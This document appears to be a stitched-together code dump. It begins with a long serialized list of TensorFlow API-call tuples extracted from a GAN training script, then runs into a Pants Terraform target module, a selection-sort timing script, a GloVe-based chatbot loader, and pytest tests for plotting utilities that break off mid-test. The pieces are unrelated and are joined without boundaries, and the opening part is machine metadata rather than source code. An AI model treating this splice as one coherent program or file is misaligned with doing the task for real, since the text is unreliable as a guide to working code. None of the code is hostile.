((1477, 1537), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (["(name + '.Linear')", 'n_in', 'n_out', 'inputs'], {}), "(name + '.Linear', n_in, n_out, inputs)\n", (1498, 1537), True, 'import tflib as lib\n'), ((1547, 1565), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (1557, 1565), True, 'import tensorflow as tf\n'), ((1627, 1687), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (["(name + '.Linear')", 'n_in', 'n_out', 'inputs'], {}), "(name + '.Linear', n_in, n_out, inputs)\n", (1648, 1687), True, 'import tflib as lib\n'), ((1897, 1946), 'tensorflow.reshape', 'tf.reshape', (['noise', '[n_samples, 1, IM_DIM, IM_DIM]'], {}), '(noise, [n_samples, 1, IM_DIM, IM_DIM])\n', (1907, 1946), True, 'import tensorflow as tf\n'), ((2000, 2054), 'tensorflow.reshape', 'tf.reshape', (['conditions', '[n_samples, 6, IM_DIM, IM_DIM]'], {}), '(conditions, [n_samples, 6, IM_DIM, IM_DIM])\n', (2010, 2054), True, 'import tensorflow as tf\n'), ((2193, 2221), 'tensorflow.concat', 'tf.concat', (['[noise, conds]', '(1)'], {}), '([noise, conds], 1)\n', (2202, 2221), True, 'import tensorflow as tf\n'), ((2263, 2313), 'tensorflow.reshape', 'tf.reshape', (['output', '[n_samples, SQUARE_IM_DIM * 7]'], {}), '(output, [n_samples, SQUARE_IM_DIM * 7])\n', (2273, 2313), True, 'import tensorflow as tf\n'), ((2367, 2455), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (['"""Generator.Input"""', '(SQUARE_IM_DIM * 7)', '(4 * 4 * 4 * DIM)', 'output'], {}), "('Generator.Input', SQUARE_IM_DIM * 7, 4 * 4 * 4 * DIM,\n output)\n", (2388, 2455), True, 'import tflib as lib\n'), ((2484, 2541), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN1"""', '[0]', 'output'], {}), "('Generator.BN1', [0], output)\n", (2511, 2541), True, 'import tflib as lib\n'), ((2555, 2573), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2565, 2573), True, 'import tensorflow as tf\n'), ((2587, 2626), 'tensorflow.reshape', 'tf.reshape', (['output', 
'[-1, 4 * DIM, 4, 4]'], {}), '(output, [-1, 4 * DIM, 4, 4])\n', (2597, 2626), True, 'import tensorflow as tf\n'), ((2639, 2708), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.2"""', '(4 * DIM)', '(2 * DIM)', '(5)', 'output'], {}), "('Generator.2', 4 * DIM, 2 * DIM, 5, output)\n", (2664, 2708), True, 'import tflib as lib\n'), ((2718, 2781), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN2"""', '[0, 2, 3]', 'output'], {}), "('Generator.BN2', [0, 2, 3], output)\n", (2745, 2781), True, 'import tflib as lib\n'), ((2793, 2811), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2803, 2811), True, 'import tensorflow as tf\n'), ((2826, 2891), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.3"""', '(2 * DIM)', 'DIM', '(5)', 'output'], {}), "('Generator.3', 2 * DIM, DIM, 5, output)\n", (2851, 2891), True, 'import tflib as lib\n'), ((2903, 2966), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN3"""', '[0, 2, 3]', 'output'], {}), "('Generator.BN3', [0, 2, 3], output)\n", (2930, 2966), True, 'import tflib as lib\n'), ((2978, 2996), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2988, 2996), True, 'import tensorflow as tf\n'), ((3011, 3070), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.5"""', 'DIM', '(2)', '(5)', 'output'], {}), "('Generator.5', DIM, 2, 5, output)\n", (3036, 3070), True, 'import tflib as lib\n'), ((3122, 3137), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (3129, 3137), True, 'import tensorflow as tf\n'), ((3150, 3191), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, OUTPUT_DIM_FLOW]'], {}), '(output, [-1, OUTPUT_DIM_FLOW])\n', (3160, 3191), True, 'import tensorflow as tf\n'), ((3295, 3338), 'tensorflow.reshape', 'tf.reshape', (['inputs', '[-1, 2, IM_DIM, IM_DIM]'], {}), '(inputs, [-1, 2, IM_DIM, IM_DIM])\n', (3305, 3338), True, 'import 
tensorflow as tf\n'), ((3379, 3426), 'tensorflow.reshape', 'tf.reshape', (['conditions', '[-1, 6, IM_DIM, IM_DIM]'], {}), '(conditions, [-1, 6, IM_DIM, IM_DIM])\n', (3389, 3426), True, 'import tensorflow as tf\n'), ((3512, 3541), 'tensorflow.concat', 'tf.concat', (['[inputs, conds]', '(1)'], {}), '([inputs, conds], 1)\n', (3521, 3541), True, 'import tensorflow as tf\n'), ((3585, 3651), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.1"""', '(8)', 'DIM', '(5)', 'ins'], {'stride': '(2)'}), "('Discriminator.1', 8, DIM, 5, ins, stride=2)\n", (3606, 3651), True, 'import tflib as lib\n'), ((3730, 3805), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.2"""', 'DIM', '(2 * DIM)', '(5)', 'output'], {'stride': '(2)'}), "('Discriminator.2', DIM, 2 * DIM, 5, output, stride=2)\n", (3751, 3805), True, 'import tflib as lib\n'), ((3958, 4037), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.3"""', '(2 * DIM)', '(4 * DIM)', '(5)', 'output'], {'stride': '(2)'}), "('Discriminator.3', 2 * DIM, 4 * DIM, 5, output, stride=2)\n", (3979, 4037), True, 'import tflib as lib\n'), ((4421, 4462), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4 * 4 * 8 * DIM]'], {}), '(output, [-1, 4 * 4 * 8 * DIM])\n', (4431, 4462), True, 'import tensorflow as tf\n'), ((4489, 4562), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (['"""Discriminator.Output"""', '(4 * 4 * 8 * DIM)', '(1)', 'output'], {}), "('Discriminator.Output', 4 * 4 * 8 * DIM, 1, output)\n", (4510, 4562), True, 'import tflib as lib\n'), ((4569, 4593), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (4579, 4593), True, 'import tensorflow as tf\n'), ((5864, 5883), 'tensorflow.group', 'tf.group', (['*clip_ops'], {}), '(*clip_ops)\n', (5872, 5883), True, 'import tensorflow as tf\n'), ((8234, 8276), 'tensorflow.cast', 'tf.cast', (['(fixed_real_data + 1.0)', 'tf.float32'], {}), '(fixed_real_data + 1.0, tf.float32)\n', (8241, 8276), 
True, 'import tensorflow as tf\n'), ((8518, 8577), 'tensorflow.get_variable', 'tf.get_variable', (['"""noise"""'], {'shape': '[BATCH_SIZE, SQUARE_IM_DIM]'}), "('noise', shape=[BATCH_SIZE, SQUARE_IM_DIM])\n", (8533, 8577), True, 'import tensorflow as tf\n'), ((10863, 10902), 'numpy.asarray', 'np.asarray', (['sample_flowimages', 'np.int32'], {}), '(sample_flowimages, np.int32)\n', (10873, 10902), True, 'import numpy as np\n'), ((10925, 10962), 'numpy.asarray', 'np.asarray', (['real_flowimages', 'np.int32'], {}), '(real_flowimages, np.int32)\n', (10935, 10962), True, 'import numpy as np\n'), ((10984, 11033), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['sample_flowims_np', 'np.int32'], {}), '(sample_flowims_np, np.int32)\n', (11004, 11033), True, 'import tensorflow as tf\n'), ((11053, 11100), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['real_flowims_np', 'np.int32'], {}), '(real_flowims_np, np.int32)\n', (11073, 11100), True, 'import tensorflow as tf\n'), ((11297, 11364), 'tensorflow.reshape', 'tf.reshape', (['fixed_real_data_norm01', '[BATCH_SIZE, IM_DIM, IM_DIM, 2]'], {}), '(fixed_real_data_norm01, [BATCH_SIZE, IM_DIM, IM_DIM, 2])\n', (11307, 11364), True, 'import tensorflow as tf\n'), ((11617, 11672), 'tensorflow.reshape', 'tf.reshape', (['samples_01', '[BATCH_SIZE, IM_DIM, IM_DIM, 2]'], {}), '(samples_01, [BATCH_SIZE, IM_DIM, IM_DIM, 2])\n', (11627, 11672), True, 'import tensorflow as tf\n'), ((11988, 12024), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_u', 'pred_u'], {}), '(real_u, pred_u)\n', (12008, 12024), True, 'import tensorflow as tf\n'), ((12098, 12140), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_u', '[1, 2]'], {}), '(mseval_per_entry_u, [1, 2])\n', (12112, 12140), True, 'import tensorflow as tf\n'), ((12194, 12230), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_v', 'pred_v'], {}), '(real_v, pred_v)\n', (12214, 12230), True, 'import tensorflow as tf\n'), ((12304, 12346), 
'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_v', '[1, 2]'], {}), '(mseval_per_entry_v, [1, 2])\n', (12318, 12346), True, 'import tensorflow as tf\n'), ((12703, 12729), 'tensorflow.add', 'tf.add', (['mseval_u', 'mseval_v'], {}), '(mseval_u, mseval_v)\n', (12709, 12729), True, 'import tensorflow as tf\n'), ((12767, 12795), 'tensorflow.constant', 'tf.constant', (['(2.0)'], {'shape': '[64]'}), '(2.0, shape=[64])\n', (12778, 12795), True, 'import tensorflow as tf\n'), ((12867, 12893), 'tensorflow.div', 'tf.div', (['mseval_uv', 'tensor2'], {}), '(mseval_uv, tensor2)\n', (12873, 12893), True, 'import tensorflow as tf\n'), ((13327, 13384), 'tensorflow.reshape', 'tf.reshape', (['real_flowims', '[BATCH_SIZE, IM_DIM, IM_DIM, 3]'], {}), '(real_flowims, [BATCH_SIZE, IM_DIM, IM_DIM, 3])\n', (13337, 13384), True, 'import tensorflow as tf\n'), ((13399, 13436), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['real_color'], {}), '(real_color)\n', (13424, 13436), True, 'import tensorflow as tf\n'), ((13631, 13690), 'tensorflow.reshape', 'tf.reshape', (['sample_flowims', '[BATCH_SIZE, IM_DIM, IM_DIM, 3]'], {}), '(sample_flowims, [BATCH_SIZE, IM_DIM, IM_DIM, 3])\n', (13641, 13690), True, 'import tensorflow as tf\n'), ((13738, 13775), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['pred_color'], {}), '(pred_color)\n', (13763, 13775), True, 'import tensorflow as tf\n'), ((13853, 13895), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_gray', 'pred_gray'], {}), '(real_gray, pred_gray)\n', (13873, 13895), True, 'import tensorflow as tf\n'), ((13942, 13986), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_rgb', '[1, 2]'], {}), '(mseval_per_entry_rgb, [1, 2])\n', (13956, 13986), True, 'import tensorflow as tf\n'), ((15099, 15111), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (15109, 15111), True, 'import tensorflow as tf\n'), ((1838, 1882), 'tensorflow.random_normal', 'tf.random_normal', 
(['[n_samples, SQUARE_IM_DIM]'], {}), '([n_samples, SQUARE_IM_DIM])\n', (1854, 1882), True, 'import tensorflow as tf\n'), ((3847, 3914), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Discriminator.BN2"""', '[0, 2, 3]', 'output'], {}), "('Discriminator.BN2', [0, 2, 3], output)\n", (3874, 3914), True, 'import tflib as lib\n'), ((4077, 4144), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Discriminator.BN3"""', '[0, 2, 3]', 'output'], {}), "('Discriminator.BN3', [0, 2, 3], output)\n", (4104, 4144), True, 'import tflib as lib\n'), ((5285, 5310), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5299, 5310), True, 'import tensorflow as tf\n'), ((5327, 5352), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5341, 5352), True, 'import tensorflow as tf\n'), ((5355, 5380), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_real'], {}), '(disc_real)\n', (5369, 5380), True, 'import tensorflow as tf\n'), ((6082, 6146), 'tensorflow.random_uniform', 'tf.random_uniform', ([], {'shape': '[BATCH_SIZE, 1]', 'minval': '(0.0)', 'maxval': '(1.0)'}), '(shape=[BATCH_SIZE, 1], minval=0.0, maxval=1.0)\n', (6099, 6146), True, 'import tensorflow as tf\n'), ((6475, 6510), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['((slopes - 1.0) ** 2)'], {}), '((slopes - 1.0) ** 2)\n', (6489, 6510), True, 'import tensorflow as tf\n'), ((8649, 8718), 'tensorflow.random_normal', 'tf.random_normal', ([], {'shape': '[BATCH_SIZE, SQUARE_IM_DIM]', 'dtype': 'tf.float32'}), '(shape=[BATCH_SIZE, SQUARE_IM_DIM], dtype=tf.float32)\n', (8665, 8718), True, 'import tensorflow as tf\n'), ((9866, 9898), 'numpy.transpose', 'np.transpose', (['flowimg', '[2, 0, 1]'], {}), '(flowimg, [2, 0, 1])\n', (9878, 9898), True, 'import numpy as np\n'), ((10173, 10203), 'tflib.flow_handler.computeFlowImg', 'fh.computeFlowImg', (['real_uvflow'], {}), '(real_uvflow)\n', (10190, 10203), True, 'import tflib.flow_handler as 
fh\n'), ((10347, 10384), 'numpy.transpose', 'np.transpose', (['real_flowimg', '[2, 0, 1]'], {}), '(real_flowimg, [2, 0, 1])\n', (10359, 10384), True, 'import numpy as np\n'), ((10506, 10558), 'numpy.insert', 'np.insert', (['images2show', '(i * 2 + 1)', 'flowimg_T'], {'axis': '(0)'}), '(images2show, i * 2 + 1, flowimg_T, axis=0)\n', (10515, 10558), True, 'import numpy as np\n'), ((13260, 13293), 'tensorflow.cast', 'tf.cast', (['real_flowims', 'tf.float32'], {}), '(real_flowims, tf.float32)\n', (13267, 13293), True, 'import tensorflow as tf\n'), ((13562, 13597), 'tensorflow.cast', 'tf.cast', (['sample_flowims', 'tf.float32'], {}), '(sample_flowims, tf.float32)\n', (13569, 13597), True, 'import tensorflow as tf\n'), ((14568, 14634), 'tflib.plot.plot', 'lib.plot.plot', (["('MSE uv for sample %d' % (i + 1))", 'mseval_list_uv[i]'], {}), "('MSE uv for sample %d' % (i + 1), mseval_list_uv[i])\n", (14581, 14634), True, 'import tflib as lib\n'), ((14641, 14709), 'tflib.plot.plot', 'lib.plot.plot', (["('MSE rgb for sample %d' % (i + 1))", 'mseval_list_rgb[i]'], {}), "('MSE rgb for sample %d' % (i + 1), mseval_list_rgb[i])\n", (14654, 14709), True, 'import tflib as lib\n'), ((15271, 15299), 'tflib.plot.restore', 'lib.plot.restore', (['START_ITER'], {}), '(START_ITER)\n', (15287, 15299), True, 'import tflib as lib\n'), ((15527, 15538), 'time.time', 'time.time', ([], {}), '()\n', (15536, 15538), False, 'import time\n'), ((16605, 16649), 'tflib.plot.plot', 'lib.plot.plot', (['"""train disc cost"""', '_disc_cost'], {}), "('train disc cost', _disc_cost)\n", (16618, 16649), True, 'import tflib as lib\n'), ((17809, 17824), 'tflib.plot.tick', 'lib.plot.tick', ([], {}), '()\n', (17822, 17824), True, 'import tflib as lib\n'), ((4722, 4756), 'tensorflow.cast', 'tf.cast', (['cond_data_int', 'tf.float32'], {}), '(cond_data_int, tf.float32)\n', (4729, 4756), True, 'import tensorflow as tf\n'), ((5401, 5447), 'tensorflow.train.RMSPropOptimizer', 'tf.train.RMSPropOptimizer', ([], 
{'learning_rate': '(5e-05)'}), '(learning_rate=5e-05)\n', (5426, 5447), True, 'import tensorflow as tf\n'), ((5507, 5553), 'tensorflow.train.RMSPropOptimizer', 'tf.train.RMSPropOptimizer', ([], {'learning_rate': '(5e-05)'}), '(learning_rate=5e-05)\n', (5532, 5553), True, 'import tensorflow as tf\n'), ((5950, 5975), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5964, 5975), True, 'import tensorflow as tf\n'), ((5992, 6017), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (6006, 6017), True, 'import tensorflow as tf\n'), ((6020, 6045), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_real'], {}), '(disc_real)\n', (6034, 6045), True, 'import tensorflow as tf\n'), ((8320, 8360), 'tensorflow.cast', 'tf.cast', (['fixed_cond_data_int', 'tf.float32'], {}), '(fixed_cond_data_int, tf.float32)\n', (8327, 8360), True, 'import tensorflow as tf\n'), ((17783, 17799), 'tflib.plot.flush', 'lib.plot.flush', ([], {}), '()\n', (17797, 17799), True, 'import tflib as lib\n'), ((5762, 5815), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['var', 'clip_bounds[0]', 'clip_bounds[1]'], {}), '(var, clip_bounds[0], clip_bounds[1])\n', (5778, 5815), True, 'import tensorflow as tf\n'), ((6406, 6426), 'tensorflow.square', 'tf.square', (['gradients'], {}), '(gradients)\n', (6415, 6426), True, 'import tensorflow as tf\n'), ((6567, 6633), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)', 'beta1': '(0.5)', 'beta2': '(0.9)'}), '(learning_rate=0.0001, beta1=0.5, beta2=0.9)\n', (6589, 6633), True, 'import tensorflow as tf\n'), ((6692, 6758), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)', 'beta1': '(0.5)', 'beta2': '(0.9)'}), '(learning_rate=0.0001, beta1=0.5, beta2=0.9)\n', (6714, 6758), True, 'import tensorflow as tf\n'), ((16680, 16691), 'time.time', 'time.time', ([], {}), '()\n', (16689, 16691), False, 'import time\n'), ((17351, 
17374), 'numpy.mean', 'np.mean', (['dev_disc_costs'], {}), '(dev_disc_costs)\n', (17358, 17374), True, 'import numpy as np\n'), ((6903, 6926), 'tensorflow.ones_like', 'tf.ones_like', (['disc_fake'], {}), '(disc_fake)\n', (6915, 6926), True, 'import tensorflow as tf\n'), ((7012, 7036), 'tensorflow.zeros_like', 'tf.zeros_like', (['disc_fake'], {}), '(disc_fake)\n', (7025, 7036), True, 'import tensorflow as tf\n'), ((7122, 7145), 'tensorflow.ones_like', 'tf.ones_like', (['disc_real'], {}), '(disc_real)\n', (7134, 7145), True, 'import tensorflow as tf\n'), ((7188, 7243), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0002)', 'beta1': '(0.5)'}), '(learning_rate=0.0002, beta1=0.5)\n', (7210, 7243), True, 'import tensorflow as tf\n'), ((7352, 7385), 'tflib.params_with_name', 'lib.params_with_name', (['"""Generator"""'], {}), "('Generator')\n", (7372, 7385), True, 'import tflib as lib\n'), ((7407, 7462), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0002)', 'beta1': '(0.5)'}), '(learning_rate=0.0002, beta1=0.5)\n', (7429, 7462), True, 'import tensorflow as tf\n'), ((7573, 7611), 'tflib.params_with_name', 'lib.params_with_name', (['"""Discriminator."""'], {}), "('Discriminator.')\n", (7593, 7611), True, 'import tflib as lib\n')] |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.engine.rules import collect_rules
from pants.engine.target import (
COMMON_TARGET_FIELDS,
Dependencies,
FieldSet,
MultipleSourcesField,
Target,
generate_multiple_sources_field_help_message,
)
from pants.util.strutil import softwrap
class TerraformModuleSourcesField(MultipleSourcesField):
default = ("*.tf",)
expected_file_extensions = (".tf",)
ban_subdirectories = True
help = generate_multiple_sources_field_help_message(
"Example: `sources=['example.tf', 'new_*.tf', '!old_ignore.tf']`"
)
@dataclass(frozen=True)
class TerraformFieldSet(FieldSet):
required_fields = (TerraformModuleSourcesField,)
sources: TerraformModuleSourcesField
class TerraformModuleTarget(Target):
alias = "terraform_module"
core_fields = (*COMMON_TARGET_FIELDS, Dependencies, TerraformModuleSourcesField)
help = softwrap(
"""
A single Terraform module corresponding to a directory.
There must only be one `terraform_module` in a directory.
Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.
"""
)
def rules():
return collect_rules()
| [
"pants.engine.target.generate_multiple_sources_field_help_message",
"pants.util.strutil.softwrap",
"dataclasses.dataclass",
"pants.engine.rules.collect_rules"
] | [((763, 785), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (772, 785), False, 'from dataclasses import dataclass\n'), ((634, 750), 'pants.engine.target.generate_multiple_sources_field_help_message', 'generate_multiple_sources_field_help_message', (['"""Example: `sources=[\'example.tf\', \'new_*.tf\', \'!old_ignore.tf\']`"""'], {}), '(\n "Example: `sources=[\'example.tf\', \'new_*.tf\', \'!old_ignore.tf\']`")\n', (678, 750), False, 'from pants.engine.target import COMMON_TARGET_FIELDS, Dependencies, FieldSet, MultipleSourcesField, Target, generate_multiple_sources_field_help_message\n'), ((1082, 1342), 'pants.util.strutil.softwrap', 'softwrap', (['"""\n A single Terraform module corresponding to a directory.\n\n There must only be one `terraform_module` in a directory.\n\n Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.\n """'], {}), '(\n """\n A single Terraform module corresponding to a directory.\n\n There must only be one `terraform_module` in a directory.\n\n Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.\n """\n )\n', (1090, 1342), False, 'from pants.util.strutil import softwrap\n'), ((1373, 1388), 'pants.engine.rules.collect_rules', 'collect_rules', ([], {}), '()\n', (1386, 1388), False, 'from pants.engine.rules import collect_rules\n')] |
"""
@author: <NAME>
@date: 11-Jul-17
@intepreter: Python 3.6
Worst Case Analysis: Selection Sort -> O(n^2)
"""
from timeit import Timer, default_timer
from random import shuffle
ARR = list()
def selection_sort(data):
"""Selection sort implementation"""
for i in range(len(data)):
min_pos = i
for j in range(i + 1, len(data)):
if data[j] < data[min_pos]:
min_pos = j
data[i], data[min_pos] = data[min_pos], data[i]
def main():
"""Main Driver Function"""
start = default_timer()
shuffle(ARR)
print("Input Array:", ARR)
selection_sort(ARR)
print("Sorted Array:", ARR)
print("Sorting Time: %f Seconds\n" % (default_timer() - start))
if __name__ == "__main__":
print("Selection Sort")
print("-" * len("Selection Sort"))
ARR = list(range(25, 0, -1)) # Worst Case Input(Reverse Sorted)
t = Timer(main)
print(
"\nAverage sorting time for 25 elements in 3 runs = %f Seconds"
% (t.timeit(3) / 3)
)
| [
"timeit.default_timer",
"timeit.Timer",
"random.shuffle"
] | [((536, 551), 'timeit.default_timer', 'default_timer', ([], {}), '()\n', (549, 551), False, 'from timeit import Timer, default_timer\n'), ((556, 568), 'random.shuffle', 'shuffle', (['ARR'], {}), '(ARR)\n', (563, 568), False, 'from random import shuffle\n'), ((897, 908), 'timeit.Timer', 'Timer', (['main'], {}), '(main)\n', (902, 908), False, 'from timeit import Timer, default_timer\n'), ((698, 713), 'timeit.default_timer', 'default_timer', ([], {}), '()\n', (711, 713), False, 'from timeit import Timer, default_timer\n')] |
import random
import torch
import pandas as pd
import numpy as np
from glove_model import get_model
from intent_initializer import read_all_intents, read_all_responses
from GloVe_helper import GloVeLoader
PATH = './config/'
BOT_NAME = 'Bavardez'
def load_bot():
model_details = torch.load(PATH+'model_details_GloVe.pt')
model = get_model(model_details['input_size'], model_details['hidden_size'], model_details['output_size'])
model.load_state_dict(model_details['model_state'])
model.eval()
tags = model_details['tags']
return model, tags
def main():
model, tags = load_bot()
df_responses = read_all_responses()
activation = torch.nn.Softmax(1)
gl = GloVeLoader()
print("Let's chat! (GloVe version) Type \"quit\" to exit.")
while True:
sentence = input("You:\t")
if sentence == "quit":
break
embed = gl.pull_glove_embed([sentence])
output = model(embed)
probs = activation(output).flatten()
predicted_label = torch.argmax(probs)
tag = tags[predicted_label.item()]
if probs[predicted_label]>0.5:
if tag in list(df_responses.keys()):
answer = random.choice(df_responses[tag])
else:
answer = "Sorry there's an error in OUR SYSTEM! Please re-phrase"
else:
answer = "I do not understand you."
print(BOT_NAME+":\t"+answer)
print("Thankyou for using "+BOT_NAME)
if __name__ == '__main__':
main() | [
"random.choice",
"torch.nn.Softmax",
"torch.load",
"glove_model.get_model",
"GloVe_helper.GloVeLoader",
"intent_initializer.read_all_responses",
"torch.argmax"
] | [((281, 324), 'torch.load', 'torch.load', (["(PATH + 'model_details_GloVe.pt')"], {}), "(PATH + 'model_details_GloVe.pt')\n", (291, 324), False, 'import torch\n'), ((332, 434), 'glove_model.get_model', 'get_model', (["model_details['input_size']", "model_details['hidden_size']", "model_details['output_size']"], {}), "(model_details['input_size'], model_details['hidden_size'],\n model_details['output_size'])\n", (341, 434), False, 'from glove_model import get_model\n'), ((605, 625), 'intent_initializer.read_all_responses', 'read_all_responses', ([], {}), '()\n', (623, 625), False, 'from intent_initializer import read_all_intents, read_all_responses\n'), ((640, 659), 'torch.nn.Softmax', 'torch.nn.Softmax', (['(1)'], {}), '(1)\n', (656, 659), False, 'import torch\n'), ((666, 679), 'GloVe_helper.GloVeLoader', 'GloVeLoader', ([], {}), '()\n', (677, 679), False, 'from GloVe_helper import GloVeLoader\n'), ((944, 963), 'torch.argmax', 'torch.argmax', (['probs'], {}), '(probs)\n', (956, 963), False, 'import torch\n'), ((1087, 1119), 'random.choice', 'random.choice', (['df_responses[tag]'], {}), '(df_responses[tag])\n', (1100, 1119), False, 'import random\n')] |
"""
This file contains tests for plotter_utils.py.
@author: <NAME>
"""
import matplotlib.pyplot as plt
import numpy as np
import pytest
from matplotlib.figure import Figure
from gdef_reporter.plotter_styles import get_plotter_style_histogram
from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, \
_extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot
from tests.conftest import AUTO_SHOW
ORIGINAL_FIGURE_SIZE = (4, 3.5)
ORIGINAL_DPI = 300
def auto_show(fig):
    """Display *fig* interactively, but only when AUTO_SHOW is enabled in conftest.

    Keeps test runs headless by default while still allowing visual inspection
    of the generated plots during local debugging.
    """
    if not AUTO_SHOW:
        return
    fig.show()
# tests for functions to plot a 2D area map
class TestAreaPlots:
    """Tests for the 2D area-map plotting helpers ``plot_to_ax`` and ``create_plot``."""

    def test_plot_to_ax(self, data_test_cases):
        """Check default z-unit, custom title and explicit z_unit handling of plot_to_ax."""
        # case 1: defaults — colorbar axis should be labelled with "nm"
        fig_default, ax_default = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
        plot_to_ax(ax_default, data_test_cases, pixel_width=1.0)
        auto_show(fig_default)
        assert type(fig_default) is Figure
        assert fig_default.axes[1].get_title() == "nm"  # default unit for z-values should be nm

        # case 2: a custom title is passed through unchanged
        fig_titled, ax_titled = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
        pixel_width = 5.0
        title = f"{type(data_test_cases).__name__}\npixel_width={pixel_width}"
        plot_to_ax(ax_titled, data_test_cases, pixel_width=pixel_width, title=title)
        auto_show(fig_titled)
        assert ax_titled.get_title() == title

        # case 3: an explicit z_unit shows up on the colorbar axis
        fig_unit, ax_unit = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
        z_factor = 1.0
        title = f"{type(data_test_cases).__name__}\nz_unit: [m] - z_factor={z_factor}"
        plot_to_ax(ax_unit, data_test_cases, pixel_width=5.0, z_unit="µm", title=title)
        auto_show(fig_unit)
        assert fig_unit.axes[1].get_title() == "\u03BCm"

    def test_create_plot(self, data_test_cases):
        """Check figure size behaviour of create_plot for cropped (default) vs. uncropped output."""
        # default cropped=True: at least one figure dimension shrinks, but not both
        fig_cropped = create_plot(data_test_cases, 1e-6, "default value for cropped (True)", ORIGINAL_FIGURE_SIZE,
                                  ORIGINAL_DPI)
        auto_show(fig_cropped)
        shrunk = fig_cropped.get_size_inches() < ORIGINAL_FIGURE_SIZE
        assert np.any(shrunk)
        assert not np.all(shrunk)
        assert fig_cropped.dpi == ORIGINAL_DPI

        # cropped=False keeps the requested maximum figure size exactly
        fig_uncropped = create_plot(data_test_cases, 1e-6, "cropped=False", max_figure_size=ORIGINAL_FIGURE_SIZE, cropped=False)
        assert np.all(fig_uncropped.get_size_inches() == ORIGINAL_FIGURE_SIZE)
        auto_show(fig_uncropped)
class Test1DPlotZHistogram:
    """Tests for plot_z_histogram_to_ax() and create_z_histogram_plot()."""

    def test_plot_z_histogram_to_ax__defaults(self, data_test_cases):
        # check default behaviour of parameters title, n_bins, units and add_norm
        fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
        plot_z_histogram_to_ax(ax1, data_test_cases, title="")
        auto_show(fig1)
        assert len(ax1.lines) == 0  # no Gauss fit (expected default behaviour)
        assert ax1.get_title().startswith("\u03BC=")  # default title starts with mu=...
        assert ax1.get_xlabel() == "z [\u03BCm]"  # default units should be µm; note: µ == \u03BC is False!
        assert len(ax1.containers[0]) == 200  # default n_bins should be 200

